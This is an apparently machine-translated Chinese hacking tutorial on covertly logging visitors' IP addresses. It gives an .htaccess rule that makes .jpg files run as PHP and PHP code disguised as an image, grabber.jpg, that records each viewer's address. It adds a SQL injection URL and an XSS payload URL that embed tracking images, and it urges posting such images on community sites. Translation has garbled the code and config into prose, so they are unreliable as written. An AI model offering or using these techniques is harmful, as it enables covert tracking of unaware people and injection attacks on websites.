如何通过一张照片来获取IP地址？

如何通过一张照片来获取IP地址？

今天早上醒来后，看到一篇关于“应用sql注入语句获取ip详细地址”的文章。我非常喜欢它，所以我仔细地阅读了它。看完这篇文章，我有了新的想法:

根据htaccess的使用，用一张照片获取别人的ip地址。

在本示例教程中，您将学习训练如何用一张照片窃取ip详细地址。我的想法是通过改变把jpg文件解析成php文件。htaccess文件。

下面是您必须添加的代码。htaccess:

AddHandler应用程序/x-httpd-php5。使用jpeg文件交换格式存储的编码图像文件扩展名

然后将下面的代码复制到一个文本文档中，并将其命名为grabber.jpg。

<？服务器端编程语言（ProfessionalHypertextPreprocessor的缩写）

$fh=fopen('ip_list.txt'，'a')；

fwrite($fh，$_SERVER['REMOTE_ADDR']。"

");

fclose($FH)；

$im=imagecreatefromjpeg("n00b.png")；

标头('Content-Type:image/JPEG')；

imageJPEG($im)；

imagedestroy($im)；

？>

把grabber.jpg的权限管理到755，然后再找一张照片，命名为n00b.png，放在和grabber.jpg同一个文件目录下。

就是这样。一切准备就绪。当其他人访问grabber.jpg的这张照片时，他的ip地址会被记录下来。

(译者注:此项必须提交到自己的服务器空)

概念验证:

(译者注:创作者在此贴了一张ip可访问的试镜照。为了更好的保护大家的隐私，没有贴出来。读者可以自行查看创作者的博客。)

到现在，大家的照片已经可以开始工作了。

然后我想向您展示如何使用SQLi来获取详细的ip地址。其实用照片盗取ip详细地址很方便。没有理由每个人都用SQLi，但是为了更好地让读者获得很多专业知识，我最好说清楚:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'unionselect1，0x3c696d67207372633d22687474703a2f2f7c65657474696d652e65742f6964696f74735f746573745f7c61622f696d61676569702f7472796d652E6a7067223e

现在，我们来谈谈如何使用xss获取详细的ip地址:

http://leettime.net/xsslab1/chalg1.php?name=<imgsrc="https://upload.chinaz.com/2016/0411/1460368129852.jpg"alt="根据相片获得IP地址SQL引入句子SQL引入SQL引入进攻">&submit=Searchhttp://leettime.net/xsslab1/chalg1.php?name=<；img="https://upload.chinaz.com/2016/0411/1460368129852.jpg"alt="从照片中获取IP地址，将SQL引入句子，将SQL引入攻击">:&提交=搜索

好吧，就这样。

用这种方法你可以做很多有趣的事情。事实上，大多数社区都允许你发布一些照片，所以你可以使用这种方法来获取所有浏览过你的照片的人的详细ip地址。

感谢您阅读文章，黑客快乐！